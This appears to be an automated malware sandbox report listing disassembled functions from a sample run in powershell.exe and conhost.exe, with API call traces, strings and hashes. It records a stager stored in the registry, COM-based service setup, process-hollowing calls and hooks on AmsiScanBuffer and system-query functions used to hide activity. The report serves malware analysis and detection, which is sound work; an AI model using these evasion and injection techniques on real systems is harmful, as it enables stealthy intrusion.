GetProcessHeap.KERNEL32(00000000,00008000,75B12EB0,00000000,00402238), ref: 004019F4
HeapAlloc.KERNEL32(00000000), ref: 00401A01
GetProcessHeap.KERNEL32(00000000,00004000), ref: 00401A15
HeapAlloc.KERNEL32(00000000), ref: 00401A1C

Part of subcall function 00401000: CryptAcquireContextW.ADVAPI32(00401A2F,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000000,00000000,00000000,00000000,00000000,?,00401A2F), ref: 0040101E
Part of subcall function 00401000: CryptGenRandom.ADVAPI32(00401A2F,00004000,00000000,?,00401A2F), ref: 0040102D
Part of subcall function 00401000: CryptReleaseContext.ADVAPI32(00401A2F,00000000,?,00401A2F), ref: 00401039

StrStrIW.KERNELBASE(?,004037F8), ref: 00401A46
StrStrIW.SHLWAPI(00000002,004037F8), ref: 00401A6D
StrNCatW.SHLWAPI(00000000,?,?), ref: 00401A84
StrCatW.SHLWAPI(00000000,004037FC), ref: 00401A90
StrCatW.SHLWAPI(?,'+[Char](), ref: 00401AE8
StrCatW.SHLWAPI(?,?), ref: 00401AF2
StrCatW.SHLWAPI(?,'+'), ref: 00401B1C
StrCatW.SHLWAPI(00000000,?), ref: 00401B2C
StrCatW.SHLWAPI(00000000,004037FC), ref: 00401B47
StrStrIW.SHLWAPI(?,004037F8), ref: 00401B61
StrCatW.SHLWAPI(00000000,?), ref: 00401B75
StrCpyW.SHLWAPI(?,00000000), ref: 00401B7C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401B8A
HeapFree.KERNEL32(00000000), ref: 00401B93
GetProcessHeap.KERNEL32(00000000,?), ref: 00401B99
HeapFree.KERNEL32(00000000), ref: 00401B9C

Strings

'+', xrefs: 00401AFB, 00401B03, 00401B17
'+[Char](, xrefs: 00401ADF
)+', xrefs: 00401AF4

Memory Dump Source

Source File: 00000023.00000002.2430827197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_400000_powershell.jbxd

Similarity

API ID: Heap$Process$Crypt$AllocContextFree$AcquireRandomRelease
String ID: '+'$'+[Char]($)+'
API String ID: 3510167801-3465596256
Opcode ID: 77fbc5ad9c9726f67d2081292eef2cd34d774a8d956c2c838f39666ce6063c67
Instruction ID: 881abd296b23407031799d902d2f4cdc89e37ab1eeb299f195f03ae3526d8067
Opcode Fuzzy Hash: 77fbc5ad9c9726f67d2081292eef2cd34d774a8d956c2c838f39666ce6063c67
Instruction Fuzzy Hash: B051F1B1E00219ABCB14DFB4DD49AAE7BBDFB48301B14446AF605F7290DB78DA01DB64

Function 0040151A Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32($rbx-svc64), ref: 0040152C
SysAllocString.OLEAUT32(0040218C), ref: 00401538
CoInitializeEx.OLE32(00000000,00000000), ref: 0040153F
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401559
CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 00401582
VariantInit.OLEAUT32(?), ref: 00401594
VariantInit.OLEAUT32(?), ref: 00401609
CoUninitialize.COMBASE ref: 00401659
SysFreeString.OLEAUT32(00000000), ref: 00401666
SysFreeString.OLEAUT32(?), ref: 0040166B

Strings

$rbx-svc64, xrefs: 0040152A, 0040152B
$rbx-svc32, xrefs: 00401520

Memory Dump Source

Source File: 00000023.00000002.2430827197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_400000_powershell.jbxd

Similarity

API ID: String$AllocFreeInitInitializeVariant$CreateInstanceSecurityUninitialize
String ID: $rbx-svc32$$rbx-svc64
API String ID: 2407135876-384997928
Opcode ID: 7425de0db50bf038e31b53769003f6f27261718ef458d0c48b03b975902a686c
Instruction ID: a7557972db62563d574e16152cd358301487189799b80a26eca7dc015dd46a94
Opcode Fuzzy Hash: 7425de0db50bf038e31b53769003f6f27261718ef458d0c48b03b975902a686c
Instruction Fuzzy Hash: FE414471E00219AFDB01EFA4CD899AFBBBDEF49314B140469FA05FB290C6B59D45CB60

Function 00401674 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 128
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32($rbx-svc32), ref: 00401686
SysAllocString.OLEAUT32(0040218C), ref: 00401690
CoInitializeEx.COMBASE(00000000,00000000), ref: 00401699
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 004016B3
CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 004016DC
VariantInit.OLEAUT32(?), ref: 004016EE
CoUninitialize.COMBASE ref: 0040177A
SysFreeString.OLEAUT32(?), ref: 0040178C
SysFreeString.OLEAUT32(00000000), ref: 0040178F

Strings

$rbx-svc32, xrefs: 0040167A, 00401685

Memory Dump Source

Source File: 00000023.00000002.2430827197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_400000_powershell.jbxd

Similarity

API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
String ID: $rbx-svc32
API String ID: 4184240511-186198907
Opcode ID: 9c4a86625b947a533870ca7b44a4e38c24d4bbb506b8e5284733e84da50932fe
Instruction ID: fe73214060e0a71e5cb08311afe73f66ef618dc69d1aaa4bc8de0f8b6e607afc
Opcode Fuzzy Hash: 9c4a86625b947a533870ca7b44a4e38c24d4bbb506b8e5284733e84da50932fe
Instruction Fuzzy Hash: 85314471A00218AFDB01EFA8CD88DAF7B7DEF49354B104069FA05FB190C6B5AD05CBA4

Function 00401986 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 36
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Get-Delegate,00000000,00402238), ref: 00401999
StrStrIW.SHLWAPI(00000000,Get-Delegate), ref: 004019B5
StrStrIW.SHLWAPI(?,Get-Delegate,75B12EB0), ref: 004019D2

Strings

Get-Delegate, xrefs: 00401995, 004019B3, 004019C9

Memory Dump Source

Source File: 00000023.00000002.2430827197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_400000_powershell.jbxd

Similarity

API ID: lstrlen
String ID: Get-Delegate
API String ID: 1659193697-1365458365
Opcode ID: e6e519078ed7ec1137922d894eaa91ee248194be5355f25f52c42e074d7245ff
Instruction ID: 00c31201c37e283d491a5759d1d7e9797cf0b304d52834bac4b81ed49e19cba9
Opcode Fuzzy Hash: e6e519078ed7ec1137922d894eaa91ee248194be5355f25f52c42e074d7245ff
Instruction Fuzzy Hash: 7EF05B71700218ABDB145BA59E48B9FB7FCAF44344F040077E505F3290EA749E01C664

Function 00401798 Relevance: 3.0, APIs: 2, Instructions: 3
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004017A5: FindResourceA.KERNEL32(00000000,00000065,EXE), ref: 004017B5
Part of subcall function 004017A5: SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017C8
Part of subcall function 004017A5: LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017DA
Part of subcall function 004017A5: LockResource.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 004017E5
Part of subcall function 004017A5: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE,00000000,000F013F,?,?,?,?,?,?,0040179D), ref: 00401801
Part of subcall function 004017A5: RegSetValueExW.KERNELBASE(?,$rbx-stager,00000000,00000003,00000000,00000000,?,?,?,?,?,0040179D), ref: 00401818

ExitProcess.KERNEL32 ref: 0040179E

Memory Dump Source

Source File: 00000023.00000002.2430827197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_400000_powershell.jbxd

Similarity

API ID: Resource$ExitFindLoadLockOpenProcessSizeofValue
String ID:
API String ID: 3836967525-0
Opcode ID: 6f5a291add5b719a9ef9962163c102a842408bd3c615f02f78525d4f468f85bb
Instruction ID: 349935dfe58169e56b8de0d8f460e35c8f36df872e6f4d206b9f951cc53eac22
Opcode Fuzzy Hash: 6f5a291add5b719a9ef9962163c102a842408bd3c615f02f78525d4f468f85bb
Instruction Fuzzy Hash:

Non-executed Functions

Function 0040118E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 10
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,00401178,?), ref: 00401193
GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 004011A3

Strings

ntdll.dll, xrefs: 0040118E
RtlGetVersion, xrefs: 0040119D

Memory Dump Source

Source File: 00000023.00000002.2430827197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_400000_powershell.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: RtlGetVersion$ntdll.dll
API String ID: 1646373207-1489217083
Opcode ID: ee2441e5e750a461a1f1097b91d62800b241895c27a46cee72e654fece4d54b8
Instruction ID: 0863f5cf0c3234c6e1236f6f2d3f4997342a4c328dcd20e5af414fba7a7cf28b
Opcode Fuzzy Hash: ee2441e5e750a461a1f1097b91d62800b241895c27a46cee72e654fece4d54b8
Instruction Fuzzy Hash: D2C09B70F807006AFF151F709F0DB17295859487023540573B305F51D4DAFCC404D52C

Analysis Process: powershell.exePID: 6048, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	3.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	42.9%
Total number of Nodes:	28
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD9B8C0C6D Relevance: 1.6, APIs: 1, Instructions: 130
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtWriteVirtualMemory.NTDLL ref: 00007FFD9B8C0D37

Memory Dump Source

Source File: 00000024.00000002.2685516843.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9b8b0000_powershell.jbxd

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: be3786c01fe61805798d6f5ca5b0afa444038f970492ad7dc87a1612285d0dde
Instruction ID: 74a3d5da9056dd24b049de61e35c273462f2605a824777497ad055ef4539b32d
Opcode Fuzzy Hash: be3786c01fe61805798d6f5ca5b0afa444038f970492ad7dc87a1612285d0dde
Instruction Fuzzy Hash: 5C31C07191CA4C8FDB18EF98D845AF9BBE0FF59321F04426FD049D3692CB74A8468B85

Function 00007FFD9B8BE088 Relevance: 1.6, APIs: 1, Instructions: 122
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 00007FFD9B8C0B0B

Memory Dump Source

Source File: 00000024.00000002.2685516843.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9b8b0000_powershell.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: b5b19e0b2c297ee83329606b91c78b49da6300eb8824b4f4fe577fb67ad315a0
Instruction ID: 340421bf6c44c5adbe1181a3ce302e424ad334f594ce160e99c19fc6e80e6cf9
Opcode Fuzzy Hash: b5b19e0b2c297ee83329606b91c78b49da6300eb8824b4f4fe577fb67ad315a0
Instruction Fuzzy Hash: 09314872A0D74C8FEB58DBA8D8497B97BE0FB59310F04016BD049C7162D620A946CB51

Function 00007FFD9B8C0A4E Relevance: 1.6, APIs: 1, Instructions: 117
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 00007FFD9B8C0B0B

Memory Dump Source

Source File: 00000024.00000002.2685516843.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9b8b0000_powershell.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: 0b4e08060a06af7192c35f2913dbcad83c48e9cff238fbd5d42968cb79d2d60f
Instruction ID: e0f345c9c0f709ea2fc11bb0b8a3b8a46797f46a730a26c1194a34f2593361cc
Opcode Fuzzy Hash: 0b4e08060a06af7192c35f2913dbcad83c48e9cff238fbd5d42968cb79d2d60f
Instruction Fuzzy Hash: 8F31073090D7888FDB5ADB68C8557E97FE0EF56320F04429BD049C71A3D664A446CB92

Function 00007FFD9B8C0FF4 Relevance: 1.6, APIs: 1, Instructions: 115
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtResumeThread.NTDLL ref: 00007FFD9B8C10A5

Memory Dump Source

Source File: 00000024.00000002.2685516843.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9b8b0000_powershell.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 11516a727d80fdbe5b07395fdac626088c8837baeae871eec193c12ff2b7e4e2
Instruction ID: 67a6f418d9648743ec30bc3a7b471c200e962febfc3a1d6bc561d31435f664ee
Opcode Fuzzy Hash: 11516a727d80fdbe5b07395fdac626088c8837baeae871eec193c12ff2b7e4e2
Instruction Fuzzy Hash: BC312871A0C64C8FDB58EF98D8467E9BBE1EF5A320F04416BD009C3292CB70A846CB91

Function 00007FFD9B8BE0B8 Relevance: 1.6, APIs: 1, Instructions: 102
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 00007FFD9B8C0B0B

Memory Dump Source

Source File: 00000024.00000002.2685516843.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9b8b0000_powershell.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: 30246e57b7ae54ce2793467cd66bd925f2a765a677329d8079f37a8ec1fc0f4f
Instruction ID: a8a2f17dc39a06edc36d8f4a5445f8e0f64408c74409c4075b60b3fbcfbf6034
Opcode Fuzzy Hash: 30246e57b7ae54ce2793467cd66bd925f2a765a677329d8079f37a8ec1fc0f4f
Instruction Fuzzy Hash: B621A571A0CA0C8FDB58DF98D8497B97BE0EB69320F04416FD04ED3262D675A846CB91

Function 00007FFD9B8C0F30 Relevance: 1.6, APIs: 1, Instructions: 98
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtSetContextThread.NTDLL ref: 00007FFD9B8C0FBB

Memory Dump Source

Source File: 00000024.00000002.2685516843.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9b8b0000_powershell.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 46a478b9d2963f251f58f619065bb7f32c16b72498703124fc7360dcf13e9332
Instruction ID: 30dc06aaf1ee0ed1fde215d3a61b788d12db489837d54d362ee5cb4a8c4224a9
Opcode Fuzzy Hash: 46a478b9d2963f251f58f619065bb7f32c16b72498703124fc7360dcf13e9332
Instruction Fuzzy Hash: 2D21B131A0CB4C8FDB58DF98D849BE97BF0EB69320F04416BD049D3292D674A846CB91

Function 00007FFD9B980050 Relevance: 2.8, Instructions: 2778COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2687804119.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9b980000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9dd9a9617355832009fd0edc98e7179beb55cfaeae9db4c2656dce82efc33f4b
Instruction ID: a26e3514eb6c5e05d98050022ded70d6d6c6e0ae8954fe9f618ff05459a7d15e
Opcode Fuzzy Hash: 9dd9a9617355832009fd0edc98e7179beb55cfaeae9db4c2656dce82efc33f4b
Instruction Fuzzy Hash: 04133871E1DF894BEB719B58989666577D0EF68B04F0A01AED44CC32A3EE34EC41C786

Function 00007FFD9B8C0231 Relevance: 2.4, APIs: 1, Instructions: 894
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE ref: 00007FFD9B8C094D

Memory Dump Source

Source File: 00000024.00000002.2685516843.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9b8b0000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 041648890c0c147bbc2f39b5c65b70b723d4d3c9daee4dcddddcc8ff06b8536c
Instruction ID: 444f844dad7b5533136bdb8b174eecc84a9bbec868cc6884046e0dbef4291fb2
Opcode Fuzzy Hash: 041648890c0c147bbc2f39b5c65b70b723d4d3c9daee4dcddddcc8ff06b8536c
Instruction Fuzzy Hash: FED10470619A8D8FDB68EF2CCC567E977E0FF59310F14426BD84DC7292DA34A5418B82

Function 00007FFD9B8BEB0A Relevance: 1.7, APIs: 1, Instructions: 247
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileMappingW.KERNELBASE ref: 00007FFD9B8BECB6

Memory Dump Source

Source File: 00000024.00000002.2685516843.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9b8b0000_powershell.jbxd

Similarity

API ID: CreateFileMapping
String ID:
API String ID: 524692379-0
Opcode ID: 84dff63c8c7b4c90799a86cd1c4ba91d140a7b8b7b93dfe06d0a1042a0990f70
Instruction ID: db77a8c1069faab17dc4c6a07e5df50e144013c22aedcf1abf2b9da1150552ce
Opcode Fuzzy Hash: 84dff63c8c7b4c90799a86cd1c4ba91d140a7b8b7b93dfe06d0a1042a0990f70
Instruction Fuzzy Hash: 8971F63061CB8D4FDB59EF28CC557E47BE1FF59311F1442AAE84DC72A2DA74A8418B82

Function 00007FFD9B8BE8BC Relevance: 1.7, APIs: 1, Instructions: 227
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE ref: 00007FFD9B8BEA49

Memory Dump Source

Source File: 00000024.00000002.2685516843.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9b8b0000_powershell.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 7974f058c9100f8b50392d9972138afcaa0b48d7f2dff1597ceaad1f2d853eff
Instruction ID: a8e11d38f4ee84c4d7dd5a8539317aff268d829482b5110813af2e178ee19995
Opcode Fuzzy Hash: 7974f058c9100f8b50392d9972138afcaa0b48d7f2dff1597ceaad1f2d853eff
Instruction Fuzzy Hash: E661D93091CA8D4FDBA8EF28C8557E43BE0FB59311F10426AE84DC3292DA74A9458BD1

Function 00007FFD9B8BED76 Relevance: 1.6, APIs: 1, Instructions: 136
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MapViewOfFile.KERNELBASE ref: 00007FFD9B8BEE53

Memory Dump Source

Source File: 00000024.00000002.2685516843.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9b8b0000_powershell.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 3c97911e97d077a012c5dc86ee8ca740d2c4b55aff5bc5a81ed49a9068cb4a86
Instruction ID: f4e14248b34380e87c91aa8825bd4cb4b4341ce11c8b5f346980c5fef9f66b43
Opcode Fuzzy Hash: 3c97911e97d077a012c5dc86ee8ca740d2c4b55aff5bc5a81ed49a9068cb4a86
Instruction Fuzzy Hash: 6341283190CB889FDB1DDB68D8166E97BF0FF5A321F14026ED089C31A2DB647846CB91

Function 00007FFD9B8BE7B8 Relevance: 1.6, APIs: 1, Instructions: 130
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

K32GetModuleInformation.KERNEL32 ref: 00007FFD9B8BE872

Memory Dump Source

Source File: 00000024.00000002.2685516843.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9b8b0000_powershell.jbxd

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: 272f268a193420cfec0b24c7fd2110af4895eb908242c96fe766e21632e13242
Instruction ID: ca76d755010ccc0c35e1bebf1bf087c133b26230484a225d1f028e3c4a78107c
Opcode Fuzzy Hash: 272f268a193420cfec0b24c7fd2110af4895eb908242c96fe766e21632e13242
Instruction Fuzzy Hash: FF311431A0CA5C8FDB1CDBA898496F97BE1EF69321F04426FD049D3692DB7468468B81

Function 00007FFD9BB551A0 Relevance: .3, Instructions: 295
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000024.00000002.2711871127.00007FFD9BB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9bb50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d6ebe8c9cee6180368e3c5e017bcbc1d7099dca15d471be143341c15644cc56
Instruction ID: 2c119f77ca14766fdca6974fbccda4b110ea167699ac1193a431d9cb5b13cb01
Opcode Fuzzy Hash: 1d6ebe8c9cee6180368e3c5e017bcbc1d7099dca15d471be143341c15644cc56
Instruction Fuzzy Hash: C8815622B0EA8D0FEBA5D6EC48646B17BD1FFA5315B0900BAD04DC71E2ED99EC418342

Function 00007FFD9B981AB9 Relevance: .3, Instructions: 252
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000024.00000002.2687804119.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9b980000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0214080d8257b20506578fe601b86929e55287bb8b13cb5d36b70559165aca5e
Instruction ID: 4161e1670f207efc54cf6884e67585f710508926c51b6e87d567de2cd695404a
Opcode Fuzzy Hash: 0214080d8257b20506578fe601b86929e55287bb8b13cb5d36b70559165aca5e
Instruction Fuzzy Hash: 00716731A0EB895FD7A9DBA894A49603BD1EF65310B1901FED08DCB1E7DE25DC46C381

Function 00007FFD9B9829F0 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2687804119.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9b980000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90b3bd52d03771eb999723e66df8c4858317719802960b2c21eabfd6770daff2
Instruction ID: 18b94453ff939eec4d194b108358b455cfa77c0465f239e8551561d152037c3c
Opcode Fuzzy Hash: 90b3bd52d03771eb999723e66df8c4858317719802960b2c21eabfd6770daff2
Instruction Fuzzy Hash: 2C31D252A1FBCA2FE772A7B858641643BE0EF56650B0A01FBD098CB1E3E8691C458351

Function 00007FFD9BB55262 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2711871127.00007FFD9BB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9bb50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fc657ba2ad9d0406aad928f34cefb72537b2f967fa1f2a8a2fd2a6fb0203204
Instruction ID: d30f7d96080e218b2a4600f68455eeec7ee72b9f27bc886a9946e069900d994c
Opcode Fuzzy Hash: 3fc657ba2ad9d0406aad928f34cefb72537b2f967fa1f2a8a2fd2a6fb0203204
Instruction Fuzzy Hash: F301DD52F1ED1E0AFBB491EC24753B462C2FFB8616B590072D51DC32D5DC9AED420382

Analysis Process: conhost.exePID: 2756, Parent PID: 6048COMMON

Execution Graph

Execution Coverage:	1.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1457
Total number of Limit Nodes:	6

Executed Functions

Function 0000026504EA1E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 0000026504EA1E7F

Part of subcall function 0000026504EA22A8: GetModuleHandleA.KERNEL32(?,?,?,0000026504EA1EB1), ref: 0000026504EA22C0
Part of subcall function 0000026504EA22A8: GetProcAddress.KERNEL32(?,?,?,0000026504EA1EB1), ref: 0000026504EA22D1

CreateThread.KERNELBASE ref: 0000026504EA2043
TlsAlloc.KERNEL32 ref: 0000026504EA2049
TlsAlloc.KERNEL32 ref: 0000026504EA2055
TlsAlloc.KERNEL32 ref: 0000026504EA2061
TlsAlloc.KERNEL32 ref: 0000026504EA206D
TlsAlloc.KERNEL32 ref: 0000026504EA2079
TlsAlloc.KERNEL32 ref: 0000026504EA2085

Strings

AmsiScanBuffer, xrefs: 0000026504EA2012
EnumServicesStatusExW, xrefs: 0000026504EA1F71, 0000026504EA1F92
amsi.dll, xrefs: 0000026504EA2019
NtQueryDirectoryFileEx, xrefs: 0000026504EA1EFC
pdh.dll, xrefs: 0000026504EA1FD7, 0000026504EA1FF8
NtQueryDirectoryFile, xrefs: 0000026504EA1EDF
sechost.dll, xrefs: 0000026504EA1F99
ntdll.dll, xrefs: 0000026504EA1E8D
PdhGetFormattedCounterArrayW, xrefs: 0000026504EA1FF1
NtEnumerateValueKey, xrefs: 0000026504EA1F36
PdhGetRawCounterArrayW, xrefs: 0000026504EA1FD0
NtQuerySystemInformation, xrefs: 0000026504EA1EA5
NtDeviceIoControlFile, xrefs: 0000026504EA1FB6
advapi32.dll, xrefs: 0000026504EA1F57, 0000026504EA1F78
NtResumeThread, xrefs: 0000026504EA1EC2
NtEnumerateKey, xrefs: 0000026504EA1F19
EnumServiceGroupW, xrefs: 0000026504EA1F50

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: 793db5d285649f0967de13c818bf0ad4599756661b2382ebcc0fc16aee855e0f
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: D551EF74104E2BE1EB05EF64EC4CBD52320B71C348F900997A50923272DE3AD26ECB93

Function 0000026504EA1E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 0000026504EA1E47
GetProcAddress.KERNEL32 ref: 0000026504EA1E57
SleepEx.KERNELBASE ref: 0000026504EA1E67

Strings

AmsiScanBuffer, xrefs: 0000026504EA1E50
amsi.dll, xrefs: 0000026504EA1E40

Memory Dump Source

